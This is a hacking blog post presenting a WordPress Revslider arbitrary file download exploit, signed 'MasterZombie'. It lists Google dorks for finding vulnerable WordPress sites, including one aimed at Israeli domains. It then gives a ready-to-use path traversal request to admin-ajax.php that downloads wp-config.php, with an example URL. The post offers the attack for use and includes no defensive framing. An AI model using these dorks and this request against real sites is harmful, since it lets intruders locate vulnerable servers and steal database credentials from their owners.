-->
Home  ›  0day  ›  Exploits  ›  Website Hacking

WordPress Arbitrary File Download { 0day } 2016

Post a Comment

Salam From MasterZombie

  • TITLE: WordPress Arbitrary File Download {0day}
  • #Priv8 DORKS (FIXED):
  • inurl:wp-content
  • inurl:wp-content/themes/
  • inurl:wp-content inurl:revslider
  • inurl:wp-content intext:revslider.php
  • inurl:wp-content intext:revslider_front.php
  • inurl:wp-content intext:revslider.php site:il
  • themes/WP-Smartcheck
  • themes/stendhal
  • theme/templates/sliders
  • themes/RoyalOak
  • themes/celestino2
  • plugins/dnd-shortcodes
  • themes/incrediblewp
  • themes/celestino
  • plugins/meteor-extras
  • themes/bazar
  • themes/cheope
  • themes/aziza

 How to exploit ;
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
==========================================================================


(e.g) ;

http://www.example.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
===========================================================================
 Video :

Subscribe our Youtube Channel
Regards:MasterZombie
0day Exploits Website Hacking

Related Posts

Post a Comment

Post a Comment

Subscribe Our Newsletter